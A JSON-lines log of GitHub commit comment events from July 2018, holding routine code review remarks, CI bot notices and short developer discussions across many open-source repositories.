{"id":"7913031227","type":"CommitCommentEvent","actor":{"login":"infotvbcom"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29582175,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-03T14:40:52Z","updated_at":"2018-07-03T14:40:52Z","author_association":"NONE","body":"we will fix all links\r\n\r\n"}},"created_at":"2018-07-03T14:40:52Z"}
{"id":"7913034200","type":"CommitCommentEvent","actor":{"login":"martini"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29582185,"position":null,"line":null,"path":null,"commit_id":"5bbff1076412c4e7c4a1f09b13fa7cb1bdcfa114","created_at":"2018-07-03T14:41:19Z","updated_at":"2018-07-03T14:41:19Z","author_association":"COLLABORATOR","body":"Fixes #2098 "}},"created_at":"2018-07-03T14:41:19Z"}
{"id":"7913037660","type":"CommitCommentEvent","actor":{"login":"ggalmazor"},"repo":{"name":"ggalmazor/aggregate"},"payload":{"comment":{"id":29582202,"position":21,"line":390,"path":"src/main/java/org/opendatakit/aggregate/client/permissions/AccessConfigurationSheet.java","commit_id":"eba74abe4a0482050de04dbadfec5cbfd863c5f4","created_at":"2018-07-03T14:41:53Z","updated_at":"2018-07-03T14:41:53Z","author_association":"OWNER","body":"This is not really necessary..."}},"created_at":"2018-07-03T14:41:53Z"}
{"id":"7913049192","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29582232,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-03T14:43:39Z","updated_at":"2018-07-03T14:43:39Z","author_association":"OWNER","body":"Your dmesg is from build 5.42, right? Was all that driver stuff already included at that time? I see no traces of the driver und in the old DTS there is a reference to rtl8189 (like in the Android-Image). I think, that when I added the driver I also changed the DTS accordingly.\r\n\r\nAnyway, WLAN still works for me, but I am in the middle of changing things in the DTS. So my Repo is not synced atm. "}},"created_at":"2018-07-03T14:43:39Z"}
{"id":"7913049252","type":"CommitCommentEvent","actor":{"login":"davidcava"},"repo":{"name":"davidcava/shadowsocks-libev-dsm"},"payload":{"comment":{"id":29582233,"position":null,"line":null,"path":null,"commit_id":"9a2b727c8128d8432ba756304b09ba1621a0cffd","created_at":"2018-07-03T14:43:40Z","updated_at":"2018-07-03T14:43:40Z","author_association":"OWNER","body":"Yes python is also an option.\r\nAnyway issue found, you can retry the package if you wish."}},"created_at":"2018-07-03T14:43:40Z"}
{"id":"7913050495","type":"CommitCommentEvent","actor":{"login":"WIZARDISHUNGRY"},"repo":{"name":"iotaledger/mam.client.js"},"payload":{"comment":{"id":29582235,"position":null,"line":null,"path":null,"commit_id":"977d42b31dd63aeefd3f0e37537026d23ba4dfa2","created_at":"2018-07-03T14:43:52Z","updated_at":"2018-07-03T14:43:52Z","author_association":"NONE","body":"You hard-coded the key length."}},"created_at":"2018-07-03T14:43:52Z"}
{"id":"7913051239","type":"CommitCommentEvent","actor":{"login":"GEPANG"},"repo":{"name":"GEPANG/Around-the-world"},"payload":{"comment":{"id":29582239,"position":null,"line":null,"path":null,"commit_id":"d2dde00b1120590192d47e71caee8c395115d6d5","created_at":"2018-07-03T14:43:59Z","updated_at":"2018-07-03T14:43:59Z","author_association":"OWNER","body":"Just another repository"}},"created_at":"2018-07-03T14:43:59Z"}
{"id":"7913051269","type":"CommitCommentEvent","actor":{"login":"benjaminjackman"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29582240,"position":14,"line":52,"path":"src/vs/editor/contrib/wordPartOperations/wordPartOperations.ts","commit_id":"66eb17581b3ade75da683c02f936b2355ab89627","created_at":"2018-07-03T14:43:59Z","updated_at":"2018-07-03T14:43:59Z","author_association":"NONE","body":"ctrl+alt+delete may not be the best choice for a keyboard shortcut."}},"created_at":"2018-07-03T14:43:59Z"}
{"id":"7913055176","type":"CommitCommentEvent","actor":{"login":"lightswitch05"},"repo":{"name":"lightswitch05/hosts"},"payload":{"comment":{"id":29582245,"position":null,"line":null,"path":null,"commit_id":"6a256c58cc46b43e5961373c3e5640743c178932","created_at":"2018-07-03T14:44:35Z","updated_at":"2018-07-03T14:44:35Z","author_association":"OWNER","body":"Hey @dcramer - as a developer myself, I understand the importance of collecting error logs. However, looking at your privacy statement, it looks like your company builds user profiles for targeted advertising:\r\n\r\n> We use the data we collect to operate our business, and to provide the Services to you. This includes using the data to improve [...] the relevance of our advertising.\r\n\r\nStopping that shit, which is realistically infeasible to opt-out of, is the point of this list 😃 . I'm a big fan of the [EFF's DNT Privacy Policy](https://www.eff.org/dnt-policy). If you can update your privacy policy in accordance with the EFF's, then I could be convinced to remove it from the list."}},"created_at":"2018-07-03T14:44:35Z"}
{"id":"7913056435","type":"CommitCommentEvent","actor":{"login":"manonaSamir"},"repo":{"name":"manonaSamir/travel"},"payload":{"comment":{"id":29582247,"position":null,"line":null,"path":null,"commit_id":"f8fcd4dcadae870291adbc006a3ecdfc5559dcfc","created_at":"2018-07-03T14:44:46Z","updated_at":"2018-07-03T14:44:46Z","author_association":"OWNER","body":"new change"}},"created_at":"2018-07-03T14:44:46Z"}
{"id":"7913057550","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29582248,"position":null,"line":null,"path":null,"commit_id":"d0ca3ada028e5a54078dcd3c13e28b90b4e65398","created_at":"2018-07-03T14:44:56Z","updated_at":"2018-07-03T14:44:56Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-393](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-393).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-393-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T14:44:56Z"}
{"id":"7913059648","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29582252,"position":null,"line":null,"path":null,"commit_id":"8f221e95d8e891e6060aee337bfbbef66d740693","created_at":"2018-07-03T14:45:15Z","updated_at":"2018-07-03T14:45:15Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#ci-199](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#ci-199).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-199-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-03T14:45:15Z"}
{"id":"7913059884","type":"CommitCommentEvent","actor":{"login":"zapu"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":29582253,"position":14,"line":178,"path":"protocol/avdl/stellar1/remote.avdl","commit_id":"6deed5a511820db918787caf2367e1af1709f53e","created_at":"2018-07-03T14:45:17Z","updated_at":"2018-07-03T14:45:17Z","author_association":"CONTRIBUTOR","body":"you're right, that's interesting. should we use a variant here?"}},"created_at":"2018-07-03T14:45:17Z"}
{"id":"7913060741","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/pyret-lang"},"payload":{"comment":{"id":29582256,"position":5,"line":602,"path":"src/js/trove/table.js","commit_id":"7ba464e72581c7c38a348d9b99c77bfbe1a59c2e","created_at":"2018-07-03T14:45:24Z","updated_at":"2018-07-03T14:45:24Z","author_association":"MEMBER","body":"Would it be better for this underlyingTable argument to simply be the current table, so we avoid an extra allocation?"}},"created_at":"2018-07-03T14:45:24Z"}
{"id":"7913082842","type":"CommitCommentEvent","actor":{"login":"snufflesrea"},"repo":{"name":"r4dixx/VisitCalgary"},"payload":{"comment":{"id":29582303,"position":null,"line":null,"path":null,"commit_id":"fb660b1945f5f6bc2006f2c3b99974873f57a35d","created_at":"2018-07-03T14:48:50Z","updated_at":"2018-07-03T14:48:50Z","author_association":"CONTRIBUTOR","body":"OMG I forgot this line.\r\nSo sorry"}},"created_at":"2018-07-03T14:48:50Z"}
{"id":"7913086116","type":"CommitCommentEvent","actor":{"login":"mohammed-softordi"},"repo":{"name":"Polymer/polymer"},"payload":{"comment":{"id":29582310,"position":null,"line":null,"path":null,"commit_id":"fd416a212ed725eef26d3b29bb624ed66669ad76","created_at":"2018-07-03T14:49:20Z","updated_at":"2018-07-03T14:49:20Z","author_association":"NONE","body":"Why? How should we import html elements?"}},"created_at":"2018-07-03T14:49:20Z"}
{"id":"7913090287","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29582317,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-03T14:49:59Z","updated_at":"2018-07-03T14:49:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T14:49:59Z"}
{"id":"7913092716","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29582321,"position":null,"line":null,"path":null,"commit_id":"c8ca6b74a455818126495507a5ad739791c3ab6c","created_at":"2018-07-03T14:50:20Z","updated_at":"2018-07-03T14:50:20Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-74-d8train.pantheonsite.io/)\n\nCreated multidev environment [ci-74](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#ci-74) for d8train."}},"created_at":"2018-07-03T14:50:20Z"}
{"id":"7913093653","type":"CommitCommentEvent","actor":{"login":"r4dixx"},"repo":{"name":"r4dixx/VisitCalgary"},"payload":{"comment":{"id":29582323,"position":null,"line":null,"path":null,"commit_id":"fb660b1945f5f6bc2006f2c3b99974873f57a35d","created_at":"2018-07-03T14:50:28Z","updated_at":"2018-07-03T14:50:28Z","author_association":"OWNER","body":"No problem @snufflesrea. Thank you actually, this made me dive into Butterknife :slightly_smiling_face: "}},"created_at":"2018-07-03T14:50:28Z"}
{"id":"7913094381","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29582325,"position":null,"line":null,"path":null,"commit_id":"9940504e933d6766f87dca7fccc3c2f889976a22","created_at":"2018-07-03T14:50:35Z","updated_at":"2018-07-03T14:50:35Z","author_association":"MEMBER","body":"I'll try as soon as Windows Update finishes (haven't booted my VM in a while)"}},"created_at":"2018-07-03T14:50:35Z"}
{"id":"7913101498","type":"CommitCommentEvent","actor":{"login":"alexandrudima"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29582343,"position":14,"line":52,"path":"src/vs/editor/contrib/wordPartOperations/wordPartOperations.ts","commit_id":"66eb17581b3ade75da683c02f936b2355ab89627","created_at":"2018-07-03T14:51:42Z","updated_at":"2018-07-03T14:51:42Z","author_association":"MEMBER","body":":-)"}},"created_at":"2018-07-03T14:51:42Z"}
{"id":"7913103163","type":"CommitCommentEvent","actor":{"login":"dcramer"},"repo":{"name":"lightswitch05/hosts"},"payload":{"comment":{"id":29582349,"position":null,"line":null,"path":null,"commit_id":"6a256c58cc46b43e5961373c3e5640743c178932","created_at":"2018-07-03T14:51:58Z","updated_at":"2018-07-03T14:51:58Z","author_association":"NONE","body":"@lightswitch05 that language is basically “if you visit our website we want to be able to use retargetted ads”. It’s very different than our data collection policies. I realize that can be confusing since it’s all lumped into one set of terms, but I’ll note we’re globally compliant with GDPRs consent policy. "}},"created_at":"2018-07-03T14:51:58Z"}
{"id":"7913106305","type":"CommitCommentEvent","actor":{"login":"vivekkr"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29582360,"position":308,"line":320,"path":"travel-provider/TSP-40-SubmitTicketDetails/TSP-40-SubmitTicketDetails-Request.schema.json","commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-03T14:52:27Z","updated_at":"2018-07-03T14:52:27Z","author_association":"CONTRIBUTOR","body":"Fixed"}},"created_at":"2018-07-03T14:52:27Z"}
{"id":"7913107814","type":"CommitCommentEvent","actor":{"login":"vivekkr"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29582363,"position":null,"line":null,"path":null,"commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-03T14:52:41Z","updated_at":"2018-07-03T14:52:41Z","author_association":"CONTRIBUTOR","body":"Incorporated comments"}},"created_at":"2018-07-03T14:52:41Z"}
{"id":"7913112079","type":"CommitCommentEvent","actor":{"login":"stevstrong"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29582367,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T14:53:18Z","updated_at":"2018-07-03T14:53:18Z","author_association":"CONTRIBUTOR","body":"Maybe we should have a look on the current `delay()` implementation [here](https://github.com/rogerclarkmelbourne/Arduino_STM32/blob/master/STM32F1/cores/maple/wirish_time.cpp#L37-L44).\r\nyield() will be called for any value passed to `delay()`.\r\nThe code of `millis()` is [here](https://github.com/rogerclarkmelbourne/Arduino_STM32/blob/4021c32fdb809f16a61c073d04e1d8c2c487a767/STM32F1/cores/maple/wirish_time.h#L45-L47). That code finally breaks down to [read a volatile variable](https://github.com/rogerclarkmelbourne/Arduino_STM32/blob/845508ee19369de64a52ee86961dd837b6459de6/STM32F1/system/libmaple/include/libmaple/systick.h#L82-L84). That volatile variable is [incremented each 1 ms here](https://github.com/rogerclarkmelbourne/Arduino_STM32/blob/2d8c6197a91d815f98c7188d0ab1c60918d18c07/STM32F1/cores/maple/libmaple/systick.c#L83-L88).\r\nThis means, that you get identical `millis()` for a while between two consecutive interrupts.\r\nNow if you start a delay after a middle of this 1 millisecond, you will get an increment after half a millisecond on the next interrupt. Which means that your delay was only half a millisecond, instead of a whole one."}},"created_at":"2018-07-03T14:53:18Z"}
{"id":"7913112473","type":"CommitCommentEvent","actor":{"login":"orivej"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29582368,"position":null,"line":null,"path":null,"commit_id":"8b312db421ca99797e60d76201f607f75c80af48","created_at":"2018-07-03T14:53:21Z","updated_at":"2018-07-03T14:53:21Z","author_association":"MEMBER","body":"This broke `dolphinEmuMaster` on Darwin: https://hydra.nixos.org/build/76809848"}},"created_at":"2018-07-03T14:53:21Z"}
{"id":"7913114334","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"JuliaComputing/PooledArrays.jl"},"payload":{"comment":{"id":29582372,"position":5,"line":7,"path":".travis.yml","commit_id":"da9c39ecc1073e0a6a14127d1e1eaf5d0523b40d","created_at":"2018-07-03T14:53:38Z","updated_at":"2018-07-03T14:53:38Z","author_association":"MEMBER","body":"Also add 0.7, but this is ok for now."}},"created_at":"2018-07-03T14:53:38Z"}
{"id":"7913119818","type":"CommitCommentEvent","actor":{"login":"martini"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29582383,"position":null,"line":null,"path":null,"commit_id":"205501f5455aed096eb18528caef086d3d16c3aa","created_at":"2018-07-03T14:54:31Z","updated_at":"2018-07-03T14:54:31Z","author_association":"COLLABORATOR","body":"Fixes #2098 "}},"created_at":"2018-07-03T14:54:31Z"}
{"id":"7913130318","type":"CommitCommentEvent","actor":{"login":"mxr576"},"repo":{"name":"mxr576/my-webdev-docker-setup"},"payload":{"comment":{"id":29582402,"position":null,"line":null,"path":null,"commit_id":"1da7d5849cab828aa4bbb4529ada21cb9627396c","created_at":"2018-07-03T14:56:05Z","updated_at":"2018-07-03T14:56:05Z","author_association":"OWNER","body":"TBD, whether we should add node container directly to the docker-compose.yml. In that case we would need to introduce a mandatory environment variable that specifies that path to the package.json that may vary because our custom theme names are project specific ones. "}},"created_at":"2018-07-03T14:56:05Z"}
{"id":"7913130375","type":"CommitCommentEvent","actor":{"login":"tooky"},"repo":{"name":"cucumber/cucumber-java-skeleton"},"payload":{"comment":{"id":29582403,"position":null,"line":null,"path":null,"commit_id":"e163b28ae2f91128c4d739e5a297f2779897072c","created_at":"2018-07-03T14:56:06Z","updated_at":"2018-07-03T14:56:06Z","author_association":"MEMBER","body":"Ok so without the AUTH token the request will be dropped by Cucumber Pro? But the request - with the data - will still hit the server and be in our logs?"}},"created_at":"2018-07-03T14:56:06Z"}
{"id":"7913130894","type":"CommitCommentEvent","actor":{"login":"dweggemans"},"repo":{"name":"App-vNext/Polly.Caching.MemoryCache"},"payload":{"comment":{"id":29582404,"position":null,"line":null,"path":null,"commit_id":"bd19386b37f518fb70b94fd1f337fb9dc33618f4","created_at":"2018-07-03T14:56:11Z","updated_at":"2018-07-03T14:56:11Z","author_association":"NONE","body":"@joelhulen is this release planned yet? I'm running into some version conflicts and have to upgrade to Polly 6.0.1, but I currently cannot with MemoryCache version 1.1.0"}},"created_at":"2018-07-03T14:56:11Z"}
{"id":"7913136014","type":"CommitCommentEvent","actor":{"login":"Jazaret"},"repo":{"name":"Jazaret/Nancy"},"payload":{"comment":{"id":29582418,"position":null,"line":null,"path":null,"commit_id":"e6e61719309754654970a0b79900a5b4e2d065c3","created_at":"2018-07-03T14:56:55Z","updated_at":"2018-07-03T14:56:55Z","author_association":"OWNER","body":"Fixes #3 "}},"created_at":"2018-07-03T14:56:55Z"}
{"id":"7913136992","type":"CommitCommentEvent","actor":{"login":"cozy1"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":29582424,"position":null,"line":null,"path":null,"commit_id":"f393a62149a1431f82de173f456fb031a024dade","created_at":"2018-07-03T14:57:04Z","updated_at":"2018-07-03T14:57:04Z","author_association":"CONTRIBUTOR","body":"Same here! TY"}},"created_at":"2018-07-03T14:57:04Z"}
{"id":"7913137373","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29582430,"position":null,"line":null,"path":null,"commit_id":"19f3ea28871eac4ad2fbb77978c09b5733328b95","created_at":"2018-07-03T14:57:08Z","updated_at":"2018-07-03T14:57:08Z","author_association":"OWNER","body":"Good - and if you remove indent on `hide-list-style`, that ought to fix things."}},"created_at":"2018-07-03T14:57:08Z"}
{"id":"7913140999","type":"CommitCommentEvent","actor":{"login":"coffeedogs"},"repo":{"name":"Bitmessage/PyBitmessage"},"payload":{"comment":{"id":29582440,"position":null,"line":null,"path":null,"commit_id":"799933086a0daf95c3da854530d8e8cbdc8d244d","created_at":"2018-07-03T14:57:41Z","updated_at":"2018-07-03T14:57:41Z","author_association":"COLLABORATOR","body":"Downgrading crypto library on Windows? Hmm. We could certainly do with some rationale for this. Having only briefly looked into this (and don't have a windows box available for testing right now), can we not instead do one of:\r\n\r\n * detect whether the later names are available, like https://mta.openssl.org/pipermail/openssl-dev/2016-August/008351.html\r\n * warn people to upgrade and quit since we may (will, eventually) be undermining their security\r\n * do nothing. Maybe your windows box is out of date? "}},"created_at":"2018-07-03T14:57:41Z"}
{"id":"7913144260","type":"CommitCommentEvent","actor":{"login":"SinaraSSB"},"repo":{"name":"SinaraSSB/aulaphp"},"payload":{"comment":{"id":29582445,"position":null,"line":null,"path":null,"commit_id":"30c43eb4a85df861f44e282f24408ffec56bc722","created_at":"2018-07-03T14:58:12Z","updated_at":"2018-07-03T14:58:12Z","author_association":"OWNER","body":"teste arquivo"}},"created_at":"2018-07-03T14:58:12Z"}
{"id":"7913148113","type":"CommitCommentEvent","actor":{"login":"adamgibbins"},"repo":{"name":"tim-group/stackbuilder"},"payload":{"comment":{"id":29582454,"position":null,"line":null,"path":null,"commit_id":"49079519bfca7d77dcc3949b91c6040632608b2c","created_at":"2018-07-03T14:58:47Z","updated_at":"2018-07-03T14:58:47Z","author_association":"MEMBER","body":"I see no validation to check that it is me triggering the rebuild, please fix or amend your commit message."}},"created_at":"2018-07-03T14:58:47Z"}
{"id":"7913156657","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582481,"position":42,"line":79,"path":"storage/innobase/include/row0purge.h","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:00:04Z","updated_at":"2018-07-03T15:00:04Z","author_association":"CONTRIBUTOR","body":"The `NULL` values of `sec_pcur` and `sec_mtr` must be documented. When are they OK to be passed as `NULL`?\r\nPlease change a comment to something like this:\r\n```\r\n@param[in]\tis_tree\t\ttrue=pessimistic purge, false=optimistic (leaf-page only)\r\n```"}},"created_at":"2018-07-03T15:00:04Z"}
{"id":"7913164519","type":"CommitCommentEvent","actor":{"login":"mlsteele"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":29582499,"position":14,"line":178,"path":"protocol/avdl/stellar1/remote.avdl","commit_id":"6deed5a511820db918787caf2367e1af1709f53e","created_at":"2018-07-03T15:01:11Z","updated_at":"2018-07-03T15:01:11Z","author_association":"CONTRIBUTOR","body":"Could do what buildPaymentLocal does. Which is representing a similar thing: the user's intention of what to send either in asset or outside.\r\nhttps://github.com/keybase/client/blob/a737c02f3890713a1f277c281c0e385e12bd2a96/protocol/avdl/stellar1/local.avdl#L178"}},"created_at":"2018-07-03T15:01:11Z"}
{"id":"7913166850","type":"CommitCommentEvent","actor":{"login":"moderndeveloperllc"},"repo":{"name":"Polymer/polymer"},"payload":{"comment":{"id":29582503,"position":null,"line":null,"path":null,"commit_id":"fd416a212ed725eef26d3b29bb624ed66669ad76","created_at":"2018-07-03T15:01:31Z","updated_at":"2018-07-03T15:01:31Z","author_association":"NONE","body":"@ztzven @mohammed-softordi Polymer 3 uses ES6 module imports rather than HTML imports now. You may need to read up on all the [changes Polymer 3 brings about](https://www.polymer-project.org/3.0/docs/about_30) as they are quite extensive."}},"created_at":"2018-07-03T15:01:31Z"}
{"id":"7913166935","type":"CommitCommentEvent","actor":{"login":"joelhulen"},"repo":{"name":"App-vNext/Polly.Caching.MemoryCache"},"payload":{"comment":{"id":29582504,"position":null,"line":null,"path":null,"commit_id":"bd19386b37f518fb70b94fd1f337fb9dc33618f4","created_at":"2018-07-03T15:01:32Z","updated_at":"2018-07-03T15:01:32Z","author_association":"MEMBER","body":"@dweggemans This has been released for 19 days now: https://www.nuget.org/packages/Polly.Caching.Memory\r\n\r\nThe name of the NuGet package had changed with this version to standardize naming across several extension packages. The NuGet package page says as much, but that's probably not clear when viewing through the NuGet Package Manager."}},"created_at":"2018-07-03T15:01:32Z"}
{"id":"7913170200","type":"CommitCommentEvent","actor":{"login":"alovega"},"repo":{"name":"alovega/simple-web-application"},"payload":{"comment":{"id":29582513,"position":null,"line":null,"path":null,"commit_id":"8e4bf1c07cb5ce8ddb070e6a93d7d2381cbf3645","created_at":"2018-07-03T15:02:03Z","updated_at":"2018-07-03T15:02:03Z","author_association":"OWNER","body":"adds .idea file to my gitignore"}},"created_at":"2018-07-03T15:02:03Z"}
{"id":"7913179248","type":"CommitCommentEvent","actor":{"login":"simbachao"},"repo":{"name":"simbachao/gitskills"},"payload":{"comment":{"id":29582534,"position":null,"line":null,"path":null,"commit_id":"8c0591877698eb8417578cdaabf1ff34bd3f80f2","created_at":"2018-07-03T15:03:27Z","updated_at":"2018-07-03T15:03:27Z","author_association":"OWNER","body":"this is gitskills readme."}},"created_at":"2018-07-03T15:03:27Z"}
{"id":"7913181854","type":"CommitCommentEvent","actor":{"login":"lightswitch05"},"repo":{"name":"lightswitch05/hosts"},"payload":{"comment":{"id":29582537,"position":null,"line":null,"path":null,"commit_id":"6a256c58cc46b43e5961373c3e5640743c178932","created_at":"2018-07-03T15:03:49Z","updated_at":"2018-07-03T15:03:49Z","author_association":"OWNER","body":"`¯\\_(ツ)_/¯` I'm not a lawyer, but what it sounds like is you could easily add the EFF's do not track policy without any major issues. If you get that added, I can remove you from the list. Also, you would be protecting your site from being blocked by the [Privacy Badger](https://www.eff.org/privacybadger#faq--I-am-an-online-advertising-/-tracking-company.--How-do-I-stop-Privacy-Badger-from-blocking-me?) as well, so win-win."}},"created_at":"2018-07-03T15:03:49Z"}
{"id":"7913189372","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29582552,"position":null,"line":null,"path":null,"commit_id":"03f9f93c44700ab429d0e63e9083a00fe08d9364","created_at":"2018-07-03T15:04:55Z","updated_at":"2018-07-03T15:04:55Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2970 of 2970 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-03T15:04:55Z"}
{"id":"7913202719","type":"CommitCommentEvent","actor":{"login":"coffeedogs"},"repo":{"name":"Bitmessage/PyBitmessage"},"payload":{"comment":{"id":29582591,"position":4,"line":15,"path":"setup.py","commit_id":"c28a4f6174419ab3d58a7c84482dcdc895182ad8","created_at":"2018-07-03T15:06:57Z","updated_at":"2018-07-03T15:06:57Z","author_association":"COLLABORATOR","body":"Why are we changing the order here? This has no effect AFAIK (happy to be proved wrong) and will only upset those that like lists like this in alphabetical order."}},"created_at":"2018-07-03T15:06:57Z"}
{"id":"7913205961","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582599,"position":59,"line":137,"path":"storage/innobase/include/row0purge.h","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:07:24Z","updated_at":"2018-07-03T15:07:24Z","author_association":"CONTRIBUTOR","body":"The comments should say something about the lifetime of these members. When are they created? When are they safe to access, when invalidated? Which `mtr_t` is `sec_pcur` paired with? Where is `vcol_info` allocated from?"}},"created_at":"2018-07-03T15:07:24Z"}
{"id":"7913210693","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582607,"position":16,"line":16,"path":".gitignore","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:08:04Z","updated_at":"2018-07-03T15:08:04Z","author_association":"NONE","body":"@michiosekine デフォルトで node_modulesはgitの登録対象から除外されています。"}},"created_at":"2018-07-03T15:08:04Z"}
{"id":"7913211009","type":"CommitCommentEvent","actor":{"login":"infotvbcom"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":29582608,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2018-07-03T15:08:08Z","updated_at":"2018-07-03T15:08:08Z","author_association":"NONE","body":"親愛的客戶:\r\n \r\n請勿非法下載myTV SUPER視頻資源，TVB將透過有關部門追究法律責任。\r\n\r\nTVB將通過IP識別香港用戶IP，鎖定本港非法下載用戶，追究其法律責任。\r\n\r\n希望各位客戶投訴舉報，感謝支持myTV SUPER 。歡迎致電 (852) 2399 9666 與我們客戶服務部聯絡。\r\n \r\n祝\r\n生活愉快！\r\nmyTV SUPER客戶服務部\r\n"}},"created_at":"2018-07-03T15:08:08Z"}
{"id":"7913218207","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582614,"position":76,"line":157,"path":"storage/innobase/include/row0purge.h","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:09:14Z","updated_at":"2018-07-03T15:09:14Z","author_association":"CONTRIBUTOR","body":"Can these member functions be declared `const`?"}},"created_at":"2018-07-03T15:09:14Z"}
{"id":"7913219822","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582617,"position":4,"line":38,"path":"storage/innobase/include/row0vers.h","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:09:29Z","updated_at":"2018-07-03T15:09:29Z","author_association":"CONTRIBUTOR","body":"Do we really need to add an `#include` to a .h file?"}},"created_at":"2018-07-03T15:09:29Z"}
